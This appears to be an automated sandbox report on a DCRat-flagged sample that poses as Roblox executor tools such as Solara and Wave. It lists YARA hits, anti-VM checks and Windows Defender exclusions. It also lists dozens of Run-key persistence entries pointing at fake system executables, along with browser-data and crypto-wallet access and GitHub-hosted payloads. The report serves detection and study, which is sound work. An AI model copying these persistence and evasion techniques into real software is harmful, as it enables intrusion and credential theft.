Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1148 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4560 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1860 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2784 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4876 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 180 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3160 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1892 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1552 2244 schtasks.exe 270 -
resource yara_rule behavioral1/files/0x000a0000000234a0-16.dat dcrat behavioral1/memory/3332-20-0x0000000000400000-0x0000000000CC5000-memory.dmp dcrat behavioral1/files/0x00070000000234ac-26.dat dcrat behavioral1/memory/3032-38-0x0000000000400000-0x0000000000B36000-memory.dmp dcrat behavioral1/files/0x00070000000234ad-50.dat dcrat behavioral1/memory/3684-63-0x0000000000400000-0x00000000008E8000-memory.dmp dcrat behavioral1/files/0x00070000000234b8-85.dat dcrat behavioral1/memory/4208-92-0x0000000000400000-0x000000000069B000-memory.dmp dcrat behavioral1/files/0x00070000000234bb-107.dat dcrat behavioral1/memory/1244-109-0x00000000000E0000-0x0000000000264000-memory.dmp dcrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4188 powershell.exe 4668 powershell.exe 2360 powershell.exe 808 powershell.exe 4756 powershell.exe 4312 powershell.exe 636 powershell.exe 2612 powershell.exe 1148 powershell.exe 3612 powershell.exe 5084 powershell.exe 3200 powershell.exe 2864 powershell.exe 4996 powershell.exe 4100 powershell.exe 4840 powershell.exe 3032 powershell.exe 4388 powershell.exe 1008 powershell.exe 1444 powershell.exe 4920 powershell.exe -
Downloads MZ/PE file
-
.NET Reactor proctector 5 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000a0000000234a0-16.dat net_reactor behavioral1/memory/3332-20-0x0000000000400000-0x0000000000CC5000-memory.dmp net_reactor behavioral1/files/0x00070000000234ac-26.dat net_reactor behavioral1/memory/3032-38-0x0000000000400000-0x0000000000B36000-memory.dmp net_reactor behavioral1/memory/3684-63-0x0000000000400000-0x00000000008E8000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cd57e4c171d6e8f5ea8b8f824a6a7316.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Checks computer location settings 2 TTPs 22 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation SolaraBoostrapper.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation Jopasobaki.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation Solarascripts.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation MsPortserver.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation Solaradrive.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation solara.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation SearchApp.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation WaveWindows.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation Bloxstrap.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation Result.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation browserwinsvc.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation SolaraBootstrapper.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation SearchApp.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation WaveInstaller.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation Wave.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation Neo.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation WaveBootstrapper.exe -
Executes dropped EXE 35 IoCs
pid Process 944 WaveInstaller.exe 3032 SolaraBoostrapper.exe 3684 Jopasobaki.exe 4428 Solarascripts.exe 4208 Result.exe 3028 Solaradrive.exe 2648 SolaraBootstrapper.exe 388 solara.exe 1244 browserwinsvc.exe 2460 MsPortserver.exe 2540 browserwinsvc.exe 4420 SearchApp.exe 3916 Neo.exe 2744 msiexec.exe 1292 vc_redist.x64.exe 3880 vc_redist.x64.exe 1292 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 4216 RuntimeBroker.exe 2608 SearchApp.exe 4948 RuntimeBroker.exe.exe 1516 msiexec.exe 5012 SearchApp.exe.exe 2904 csrss.exe 2796 WaveBootstrapper.exe 3204 SearchApp.exe 5428 msiexec.exe 5464 SearchApp.exe.exe 4788 WaveWindows.exe 1724 CefSharp.BrowserSubprocess.exe 1176 CefSharp.BrowserSubprocess.exe 3348 node.exe 3200 Bloxstrap.exe 4388 CefSharp.BrowserSubprocess.exe 5164 browserwinsvc.exe.exe 2228 CefSharp.BrowserSubprocess.exe -
Loads dropped DLL 57 IoCs
pid Process 2784 MsiExec.exe 2784 MsiExec.exe 3192 MsiExec.exe 3192 MsiExec.exe 3192 MsiExec.exe 3192 MsiExec.exe 3192 MsiExec.exe 228 MsiExec.exe 228 MsiExec.exe 228 MsiExec.exe 2784 MsiExec.exe 3880 vc_redist.x64.exe 1292 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 1292 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 1292 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 1292 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 1292 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 2796 WaveBootstrapper.exe 4788 WaveWindows.exe 4788 WaveWindows.exe 4788 WaveWindows.exe 4788 WaveWindows.exe 4788 WaveWindows.exe 1724 CefSharp.BrowserSubprocess.exe 1724 CefSharp.BrowserSubprocess.exe 1724 CefSharp.BrowserSubprocess.exe 1724 CefSharp.BrowserSubprocess.exe 1724 CefSharp.BrowserSubprocess.exe 1724 CefSharp.BrowserSubprocess.exe 1724 CefSharp.BrowserSubprocess.exe 1724 CefSharp.BrowserSubprocess.exe 1724 CefSharp.BrowserSubprocess.exe 1724 CefSharp.BrowserSubprocess.exe 1724 CefSharp.BrowserSubprocess.exe 1176 CefSharp.BrowserSubprocess.exe 1176 CefSharp.BrowserSubprocess.exe 1176 CefSharp.BrowserSubprocess.exe 1176 CefSharp.BrowserSubprocess.exe 1176 CefSharp.BrowserSubprocess.exe 1176 CefSharp.BrowserSubprocess.exe 1176 CefSharp.BrowserSubprocess.exe 4788 WaveWindows.exe 4388 CefSharp.BrowserSubprocess.exe 4388 CefSharp.BrowserSubprocess.exe 4388 CefSharp.BrowserSubprocess.exe 4388 CefSharp.BrowserSubprocess.exe 4388 CefSharp.BrowserSubprocess.exe 4388 CefSharp.BrowserSubprocess.exe 4388 CefSharp.BrowserSubprocess.exe 2228 CefSharp.BrowserSubprocess.exe 2228 CefSharp.BrowserSubprocess.exe 2228 CefSharp.BrowserSubprocess.exe 2228 CefSharp.BrowserSubprocess.exe 2228 CefSharp.BrowserSubprocess.exe 2228 CefSharp.BrowserSubprocess.exe 2228 CefSharp.BrowserSubprocess.exe 2228 CefSharp.BrowserSubprocess.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/1292-4707-0x0000000180000000-0x0000000180B0D000-memory.dmp themida behavioral1/memory/1292-4743-0x0000000180000000-0x0000000180B0D000-memory.dmp themida behavioral1/memory/1292-4791-0x0000000180000000-0x0000000180B0D000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 46 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\mswebFonthost\\wininit.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\mswebFonthost\\wscript.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Logs\\WindowsUpdate\\smss.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\providerWebFont\\services.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WaveInstaller = "\"C:\\Users\\Default\\Local Settings\\WaveInstaller.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\mswebFonthost\\wininit.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\mswebFonthost\\dllhost.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\mswebFonthost\\wscript.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsPortserver = "\"C:\\providerWebFont\\MsPortserver.exe\"" MsPortserver.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\browserwinsvc = "\"C:\\mswebFonthost\\browserwinsvc.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\providerWebFont\\services.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\mswebFonthost\\csrss.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\explorer.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Users\\Default\\PrintHood\\System.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\mswebFonthost\\fontdrvhost.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\"" MsPortserver.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neo = "\"C:\\mswebFonthost\\Neo.exe\"" Neo.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\explorer.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\"" MsPortserver.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\mswebFonthost\\csrss.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WaveInstaller = "\"C:\\Program Files (x86)\\Windows Portable Devices\\WaveInstaller.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Users\\Default\\PrintHood\\System.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\providerWebFont\\fontdrvhost.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\browserwinsvc = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\mswebFonthost\\fontdrvhost.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\SolaraTab\\msedge.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WaveInstaller = "\"C:\\Program Files (x86)\\Windows Portable Devices\\WaveInstaller.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Default\\Desktop\\Idle.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\providerWebFont\\fontdrvhost.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\mswebFonthost\\dllhost.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" Neo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\SolaraTab\\msedge.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WaveInstaller = "\"C:\\Users\\Default\\Local Settings\\WaveInstaller.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Program Files\\Microsoft Office 15\\unsecapp.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Program Files\\Microsoft Office 15\\unsecapp.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Logs\\WindowsUpdate\\smss.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\browserwinsvc = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\browserwinsvc = "\"C:\\mswebFonthost\\browserwinsvc.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsPortserver = "\"C:\\providerWebFont\\MsPortserver.exe\"" MsPortserver.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" Neo.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neo = "\"C:\\mswebFonthost\\Neo.exe\"" Neo.exe Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Default\\Desktop\\Idle.exe\"" RuntimeBroker.exe.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 10 2188 msiexec.exe 12 2188 msiexec.exe -
Checks for any installed AV software in registry 1 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Software\KasperskyLab WaveWindows.exe Key created \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Software\KasperskyLab WaveWindows.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\KasperskyLab\LastUsername WaveWindows.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\KasperskyLab\Session WaveWindows.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
flow ioc 62 raw.githubusercontent.com 270 raw.githubusercontent.com 53 raw.githubusercontent.com 339 raw.githubusercontent.com 340 raw.githubusercontent.com 341 raw.githubusercontent.com 342 raw.githubusercontent.com 268 raw.githubusercontent.com 74 raw.githubusercontent.com 80 raw.githubusercontent.com 269 raw.githubusercontent.com 271 raw.githubusercontent.com 52 raw.githubusercontent.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com 34 ipinfo.io 35 ipinfo.io 96 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSCFBD68506DF90496CBF5290C4B8CE8FF3.TMP csc.exe File created \??\c:\Windows\System32\2cujat.exe csc.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1292 cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\valid.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\workspaces\update-workspaces.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-packlist\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-install-ci-test.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\restart.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\node.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\LICENSE.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\mac_tool.py msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\has-unicode\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\emoji-regex\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\buffer\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\orgs.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmaccess\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmversion\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\npmrc msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\jsonparse\bench.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\explore.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\retry\lib\retry_operation.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\emoji-regex\es2015\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\lib\content\path.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-help.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\utils\oid.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\sigstore.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\just-diff\index.cjs msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\types\sigstore\__generated__\sigstore_common.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\find-dupes.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\xcodeproj_file.py msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\@npmcli\fs\lib\with-owner-sync.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-help-search.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\vuln.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\internal\streams\operators.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\dist-tag.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\lib\util\tmp.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\util\json.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\corepack\shims\yarnpkg.ps1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\types\sigstore\validate.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\id.js msiexec.exe File created C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping4788_1888021287\_platform_specific\win_x86\widevinecdm.dll WaveWindows.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\x509\cert.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\gauge\lib\progress-bar.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\make-fetch-happen\lib\cache\policy.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\types\sigstore\__generated__\sigstore_rekor.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\models\snapshot.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\workspaces.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\fastest-levenshtein\mod.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\adduser.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\which\which.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\signal-exit\LICENSE.txt msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-outdated.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\minipass-fetch\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-normalize-package-bin\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\x509\sct.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\rimraf\node_modules\glob\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-find-dupes.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\encoding\lib\encoding.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\bin\license.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\read-package-json\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\iconv-lite\encodings\tables\gbk-added.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cli-table3\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\iconv-lite\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\color-convert\conversions.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\fs\package.json msiexec.exe -
Drops file in Windows directory 27 IoCs
